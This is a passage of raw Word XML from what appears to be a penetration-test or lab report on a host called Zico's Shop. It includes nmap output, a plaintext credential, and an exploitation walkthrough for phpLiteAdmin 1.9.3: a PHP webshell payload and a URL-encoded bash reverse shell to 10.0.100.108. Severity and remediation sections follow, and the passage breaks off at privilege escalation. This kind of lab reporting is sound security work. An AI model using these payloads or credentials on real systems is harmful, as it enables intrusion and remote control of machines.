        <w:t>2MHCgxkXl5G/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO/a6T/eQAAAIEAlsW/i/dUuFbRVO2zaAKwL/CFWT19Al7+njszC5FCJ2degg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mF/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>9x6LxwsDw=</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| ssh-rsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn/OMDgb</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>f2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6b</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>iJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|   256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2AT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>okB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>80/tcp    open  http    syn-ack ttl 128 Apache httpd 2.2.22 ((Ubuntu))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>| http-methods:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_  Supported Methods: GET HEAD POST OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-server-header: Apache/2.2.22 (Ubuntu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-title: Zico's Shop</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>111/tcp   open  rpcbind syn-ack ttl 128 2-4 (RPC #100000)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>39881/tcp open  status  syn-ack ttl 128 1 (RPC #100024)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA47" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="network-interfaces-2"/>
      <w:r>
        <w:t>Network interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="70FCEA48" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet 127.0.0.1/8 scope host lo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet6 ::1/128 scope host </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       valid_lft forever preferred_lft forever</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP qlen 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    link/ether 00:0c:29:e2:b0:d1 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet 10.0.100.105/24 brd 10.0.100.255 scope global eth0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet6 fe80::20c:29ff:fee2:b0d1/64 scope link </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       valid_lft forever preferred_lft forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA49" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="credentials-2"/>
      <w:r>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="70FCEA4A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>zico:sWfCsfJSPV9H3AmQzw8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA4B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="exploitation-and-proof-2"/>
      <w:r>
        <w:t>Exploitation and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="70FCEA4C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="initial-access-2"/>
      <w:r>
        <w:t>Initial access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="70FCEA4D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="vulnerability-exploitation-4"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="70FCEA4E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap finds a handful of ports open, of which SSH and HTTP are most notable. Starting with the HTTP server, we can enumerate several pages and directories on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA4F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># gobuster dir -u http://10.0.100.105/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -o gobuster.out</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/index (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/index.html (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/img (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/tools (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/tools.html (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/view (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/view.php (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/css (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/js (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/vendor (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/package (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/LICENSE (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/less (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/server-status (Status: 403)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/dbadmin (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA50" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/dbadmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> looks interesting. It has directory listing enabled, which shows us that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>test_db.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exists in that directory. Here, we can login with a default password of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phpLiteAdmin v1.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This system has a </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>known vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> that could allow us to write arbitrary code to PHP files, which will get executed server-side!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA51" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To exploit this vulnerability, we create a new database called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>hack.php</w:t>
      </w:r>
      <w:r>
        <w:t>, and populate this database with one table that has one column. We configure this column to have the following default value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA52" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;?php echo system($_GET["cmd"]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA53" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t>Note the double quotes! Single quotes don’t work because the payload is already embedded in single quotes by the phpLiteAdmin application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA54" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the database settings, we see that our simple webshell is written to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/usr/databases/hack.php</w:t>
      </w:r>
      <w:r>
        <w:t>. Unfortunately, we cannot access this directory. We can rename the payload to attempt to specify a new path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA55" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEADE" wp14:editId="70FCEADF">
            <wp:extent cx="5943600" cy="2204124"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture" descr="53050bc09b2c873bb4e6146f335fb1e5.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/dedb017ab57246aab374a65165e16d64.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2204124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA56" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>53050bc09b2c873bb4e6146f335fb1e5.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA57" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looking at the directory listing in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/dbadmin</w:t>
      </w:r>
      <w:r>
        <w:t>, it seems to have been written correctly! Now we can visit our page to see if the webshell works correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA58" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># curl http://10.0.100.105/dbadmin/cmd2.php?cmd=id --output -</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Wtable11CREATE TABLE '1' ('e' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA59" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>In the garbled output we see that our command is interpreted by PHP. Awesome, we have command execution. We send the following request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA5A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># curl --output - http://10.0.100.105/dbadmin/cmd2.php?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%30%2e%31%30%38%2f%34%34%33%20%30%3e%26%31%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA5B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t>This is the below in URL-encoded format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA5C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>bash -c 'bash -i &gt;&amp; /dev/tcp/10.0.100.108/443 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA5D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We now get a shell back as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on our listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA5E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="severity-4"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="70FCEA5F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - An attacker with connectivity to the machine may guess the credentials for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and use the known vulnerability in this system to gain command execution on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA60" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="remediation-4"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="70FCEA61" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the default password for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA62" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit access to the database where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA63" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="proof-4"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="70FCEA64" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAE0" wp14:editId="38CD5388">
            <wp:extent cx="3585219" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture" descr="9803287060e167bedf64c355ce888f98.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/d77016f6a7eb4770a8c82f92392d9ef7.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3592618" cy="3016112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA65" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>9803287060e167bedf64c355ce888f98.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA66" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="privilege-escalation-2"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="70FCEA67" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="vulnerability-exploitation-5"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="70FCEA68" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
